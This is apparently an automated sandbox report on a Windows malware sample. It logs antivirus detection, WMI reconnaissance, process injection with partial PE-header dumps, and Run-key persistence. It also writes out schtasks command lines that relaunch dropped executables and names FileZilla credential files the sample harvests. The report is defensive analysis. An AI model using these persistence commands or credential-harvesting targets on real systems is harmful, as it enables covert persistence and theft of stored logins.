NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 3832 region_size: 204800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000002c	1	0
NtAllocateVirtualMemory Oct. 16, 2023, 9:45 a.m.	process_identifier: 3992 region_size: 253952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000002c	1	0

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Installs itself for autorun at Windows startup (17 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP003.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP004.TMP\"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\sus.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000031051\sus.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\foto2552.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000032051\foto2552.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\nalo.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000033051\nalo.exe
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP003.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP004.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP005.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP006.TMP\"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
cmdline	/c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\7XUI4o616d4Syjf.exe" /tn "\WindowsAppPool\7XUI4o616d4Syjf"
cmdline	schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\7XUI4o616d4Syjf.exe" /tn "\WindowsAppPool\7XUI4o616d4Syjf"
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

Detects Avast Antivirus through the presence of a library (2 events)

Time & API	Arguments	Status	Return	Repeated
LdrGetDllHandle Oct. 16, 2023, 9:44 a.m.	module_name: snxhk module_address: 0x00000000 stack_pivoted: 0		3221225781	0
LdrGetDllHandle Oct. 16, 2023, 9:44 a.m.	module_name: snxhk module_address: 0x00000000 stack_pivoted: 0		3221225781	0

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Executes one or more WMI queries (8 events)

wmi	SELECT * FROM Win32_VideoController
wmi	SELECT * FROM AntivirusProduct
wmi	SELECT * FROM Win32_OperatingSystem
wmi	SELECT * FROM Win32_Process Where SessionId='1'
wmi	SELECT * FROM AntiSpyWareProduct
wmi	SELECT * FROM FirewallProduct
wmi	SELECT * FROM Win32_DiskDrive
wmi	SELECT * FROM Win32_Processor

Manipulates memory of a non-child process indicative of process injection (4 events)

Time & API	Arguments	Return	Repeated
Process injection	Process 3196 manipulating memory of non-child process 3544
Process injection	Process 3196 manipulating memory of non-child process 3604
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 3544 region_size: 204800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000002c	3221225496	0
NtAllocateVirtualMemory Oct. 16, 2023, 9:44 a.m.	process_identifier: 3604 region_size: 204800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000120	3221225496	0

Potential code injection by writing to the memory of another process (20 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $à ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhXÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°dX´ÿmY°Y¥ÿmY°oX¥ÿmYRich¤ÿmYPEL`x,eà$¸A@@ @L(ààðÐ/à @@.text) `.rdataxa@b.@@.datah#°@À.rsrcàà@@.relocÐ/ð0 @B base_address: 0x00400000 process_identifier: 2344 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: ÿÿÿÿ±¿DNæ@»ÿÿÿÿ ÿÿÿÿ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þZB@¶B@¶B@¶B@¶B@¶BH¶B]B^BÈTBµB`°BC¶BHÇBHÇBHÇBHÇBHÇBHÇBHÇBHÇBHÇB¶BLÇBLÇBLÇBLÇBLÇBLÇBLÇB..þÿÿÿ þÿÿÿuÐù¾cyåú¦eÍiLÅ?þDVÐü!Êû×6}¼$ÁªaÐº;ëZèy©Ä@éã¶úæô;;¥¹Ò3[ 1à©ÜÞÙ#,ss3WILÈ½y+ qPøkú¢¼ÇmµúÂÆâs5}àO£tdïôfGj}É¬:ø÷¹â&÷c&ÀÇ@zÞcÅgÓÑëGïNn3g\|ÔZØ²¤G> b&}LºFwXÍ\|[x¦D@q#4m$>äÂö>/ö8Iå¸7ÐGñD¨íòDñ¥Ñ&\qÀÒJ²Z $\ÒVi×´v8·´Æ&Àÿ>Ì<[ÏlEfMdý\|îoK¡JnÜnÔÏ¯ ïµÃFòÜxAayÛOw(ì³Ö-ÆÆõA5«V¥0½REAãýñbG-¨¦¥ [Êþdã0[okûhn¤ÛB±±!S^¥4\Áéj8ªJÛ®!2É)C¨ñgÕ{@ÜMZ¶ß?þ÷}M¯,ëïõ Û³OS÷=B9Àc\#Ã\9§ 0b;(Ïÿ©(ÎZï¨ðóe^4>ØxúI"WÂB°%/í¯¼áy?Ó( ÖüMÝð·7¢L{éü=·Ë¡gÇmPvl\|Sâ DÄêq¯où¾Ì !sì©M7<wòÂ,-<L1Ò ¿ü/wÌð¹DPÐò°=þoÊÐðÒ¶eÆzoaªd>aùr)0Þ sÉzdÎD8@¸Þ¿åK@X¥³jj&å"ª¯L¤E©ÊæpÏ_éKr¢OÝTmªÛªuZE)J2^D{ðR¤%£§õ¼wX"Æ®ë"~"ê<äPu¶ç5G}¹~ó³Pr<LÌu ítuuDæÔúäfÂî4Ñ@#j-ÂÒ£ÑÉºgÍZê·í2>[Ììgu½CPHçëhºö-áN($q$ãeË°þm*âk3²Jd¼I?Ó#J0ÊDêQâZb&'Ô ¦g¡Æ^_/\|B.?AVbad_exception@std@@\|B.?AVexception@std@@\|B.?AVtype_info@@ base_address: 0x0042b000 process_identifier: 2344 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: 0 H`à}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0042e000 process_identifier: 2344 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2344 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELé£×à0Æ¬îå @ à@åWN©À H.textôÅ Æ `.rsrcN©ªÈ@@.relocÀr@B base_address: 0x00400000 process_identifier: 1700 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: àð5 base_address: 0x0043c000 process_identifier: 1700 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: @ base_address: 0xfffde008 process_identifier: 1700 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: MZÿÿ@@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL²dàHvD2@õ.textytv à base_address: 0x00400000 process_identifier: 3060 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: @ base_address: 0xfffde008 process_identifier: 3060 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $à ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhXÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°dX´ÿmY°Y¥ÿmY°oX¥ÿmYRich¤ÿmYPEL`x,eà$¸A@@ @L(ààðÐ/à @@.text) `.rdataxa@b.@@.datah#°@À.rsrcàà@@.relocÐ/ð0 @B base_address: 0x00400000 process_identifier: 3668 process_handle: 0x00000128	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: ÿÿÿÿ±¿DNæ@»ÿÿÿÿ ÿÿÿÿ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þZB@¶B@¶B@¶B@¶B@¶BH¶B]B^BÈTBµB`°BC¶BHÇBHÇBHÇBHÇBHÇBHÇBHÇBHÇBHÇB¶BLÇBLÇBLÇBLÇBLÇBLÇBLÇB..þÿÿÿ þÿÿÿuÐù¾cyåú¦eÍiLÅ?þDVÐü!Êû×6}¼$ÁªaÐº;ëZèy©Ä@éã¶úæô;;¥¹Ò3[ 1à©ÜÞÙ#,ss3WILÈ½y+ qPøkú¢¼ÇmµúÂÆâs5}àO£tdïôfGj}É¬:ø÷¹â&÷c&ÀÇ@zÞcÅgÓÑëGïNn3g\|ÔZØ²¤G> b&}LºFwXÍ\|[x¦D@q#4m$>äÂö>/ö8Iå¸7ÐGñD¨íòDñ¥Ñ&\qÀÒJ²Z $\ÒVi×´v8·´Æ&Àÿ>Ì<[ÏlEfMdý\|îoK¡JnÜnÔÏ¯ ïµÃFòÜxAayÛOw(ì³Ö-ÆÆõA5«V¥0½REAãýñbG-¨¦¥ [Êþdã0[okûhn¤ÛB±±!S^¥4\Áéj8ªJÛ®!2É)C¨ñgÕ{@ÜMZ¶ß?þ÷}M¯,ëïõ Û³OS÷=B9Àc\#Ã\9§ 0b;(Ïÿ©(ÎZï¨ðóe^4>ØxúI"WÂB°%/í¯¼áy?Ó( ÖüMÝð·7¢L{éü=·Ë¡gÇmPvl\|Sâ DÄêq¯où¾Ì !sì©M7<wòÂ,-<L1Ò ¿ü/wÌð¹DPÐò°=þoÊÐðÒ¶eÆzoaªd>aùr)0Þ sÉzdÎD8@¸Þ¿åK@X¥³jj&å"ª¯L¤E©ÊæpÏ_éKr¢OÝTmªÛªuZE)J2^D{ðR¤%£§õ¼wX"Æ®ë"~"ê<äPu¶ç5G}¹~ó³Pr<LÌu ítuuDæÔúäfÂî4Ñ@#j-ÂÒ£ÑÉºgÍZê·í2>[Ììgu½CPHçëhºö-áN($q$ãeË°þm*âk3²Jd¼I?Ó#J0ÊDêQâZb&'Ô ¦g¡Æ^_/\|B.?AVbad_exception@std@@\|B.?AVexception@std@@\|B.?AVtype_info@@ base_address: 0x0042b000 process_identifier: 3668 process_handle: 0x00000128	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: 0 H`à}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0042e000 process_identifier: 3668 process_handle: 0x00000128	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: @ base_address: 0xfffde008 process_identifier: 3668 process_handle: 0x00000128	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $à ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhXÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°dX´ÿmY°Y¥ÿmY°oX¥ÿmYRich¤ÿmYPEL`x,eà$¸A@@ @L(ààðÐ/à @@.text) `.rdataxa@b.@@.datah#°@À.rsrcàà@@.relocÐ/ð0 @B base_address: 0x00400000 process_identifier: 3832 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: ÿÿÿÿ±¿DNæ@»ÿÿÿÿ ÿÿÿÿ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þZB@¶B@¶B@¶B@¶B@¶BH¶B]B^BÈTBµB`°BC¶BHÇBHÇBHÇBHÇBHÇBHÇBHÇBHÇBHÇB¶BLÇBLÇBLÇBLÇBLÇBLÇBLÇB..þÿÿÿ þÿÿÿuÐù¾cyåú¦eÍiLÅ?þDVÐü!Êû×6}¼$ÁªaÐº;ëZèy©Ä@éã¶úæô;;¥¹Ò3[ 1à©ÜÞÙ#,ss3WILÈ½y+ qPøkú¢¼ÇmµúÂÆâs5}àO£tdïôfGj}É¬:ø÷¹â&÷c&ÀÇ@zÞcÅgÓÑëGïNn3g\|ÔZØ²¤G> b&}LºFwXÍ\|[x¦D@q#4m$>äÂö>/ö8Iå¸7ÐGñD¨íòDñ¥Ñ&\qÀÒJ²Z $\ÒVi×´v8·´Æ&Àÿ>Ì<[ÏlEfMdý\|îoK¡JnÜnÔÏ¯ ïµÃFòÜxAayÛOw(ì³Ö-ÆÆõA5«V¥0½REAãýñbG-¨¦¥ [Êþdã0[okûhn¤ÛB±±!S^¥4\Áéj8ªJÛ®!2É)C¨ñgÕ{@ÜMZ¶ß?þ÷}M¯,ëïõ Û³OS÷=B9Àc\#Ã\9§ 0b;(Ïÿ©(ÎZï¨ðóe^4>ØxúI"WÂB°%/í¯¼áy?Ó( ÖüMÝð·7¢L{éü=·Ë¡gÇmPvl\|Sâ DÄêq¯où¾Ì !sì©M7<wòÂ,-<L1Ò ¿ü/wÌð¹DPÐò°=þoÊÐðÒ¶eÆzoaªd>aùr)0Þ sÉzdÎD8@¸Þ¿åK@X¥³jj&å"ª¯L¤E©ÊæpÏ_éKr¢OÝTmªÛªuZE)J2^D{ðR¤%£§õ¼wX"Æ®ë"~"ê<äPu¶ç5G}¹~ó³Pr<LÌu ítuuDæÔúäfÂî4Ñ@#j-ÂÒ£ÑÉºgÍZê·í2>[Ììgu½CPHçëhºö-áN($q$ãeË°þm*âk3²Jd¼I?Ó#J0ÊDêQâZb&'Ô ¦g¡Æ^_/\|B.?AVbad_exception@std@@\|B.?AVexception@std@@\|B.?AVtype_info@@ base_address: 0x0042b000 process_identifier: 3832 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: 0 H`à}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0042e000 process_identifier: 3832 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: @ base_address: 0xfffde008 process_identifier: 3832 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:45 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELé£×à0Æ¬îå @ à@åWN©À H.textôÅ Æ `.rsrcN©ªÈ@@.relocÀr@B base_address: 0x00400000 process_identifier: 3992 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:45 a.m.	buffer: àð5 base_address: 0x0043c000 process_identifier: 3992 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:45 a.m.	buffer: @ base_address: 0xfffde008 process_identifier: 3992 process_handle: 0x0000002c	1	1

Code injection by writing an executable or DLL to the memory of another process (6 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $à ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhXÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°dX´ÿmY°Y¥ÿmY°oX¥ÿmYRich¤ÿmYPEL`x,eà$¸A@@ @L(ààðÐ/à @@.text) `.rdataxa@b.@@.datah#°@À.rsrcàà@@.relocÐ/ð0 @B base_address: 0x00400000 process_identifier: 2344 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELé£×à0Æ¬îå @ à@åWN©À H.textôÅ Æ `.rsrcN©ªÈ@@.relocÀr@B base_address: 0x00400000 process_identifier: 1700 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: MZÿÿ@@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL²dàHvD2@õ.textytv à base_address: 0x00400000 process_identifier: 3060 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $à ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhXÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°dX´ÿmY°Y¥ÿmY°oX¥ÿmYRich¤ÿmYPEL`x,eà$¸A@@ @L(ààðÐ/à @@.text) `.rdataxa@b.@@.datah#°@À.rsrcàà@@.relocÐ/ð0 @B base_address: 0x00400000 process_identifier: 3668 process_handle: 0x00000128	1	1
WriteProcessMemory Oct. 16, 2023, 9:44 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $à ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhXÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°dX´ÿmY°Y¥ÿmY°oX¥ÿmYRich¤ÿmYPEL`x,eà$¸A@@ @L(ààðÐ/à @@.text) `.rdataxa@b.@@.datah#°@À.rsrcàà@@.relocÐ/ð0 @B base_address: 0x00400000 process_identifier: 3832 process_handle: 0x0000002c	1	1
WriteProcessMemory Oct. 16, 2023, 9:45 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELé£×à0Æ¬îå @ à@åWN©À H.textôÅ Æ `.rsrcN©ªÈ@@.relocÀr@B base_address: 0x00400000 process_identifier: 3992 process_handle: 0x0000002c	1	1

Collects information about installed applications (50 out of 152 events)

Time & API	Arguments	Status
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Excel MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft PowerPoint MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Oct. 16, 2023, 9:44 a.m.	key_handle: 0x000004f4 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Publisher MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName	1
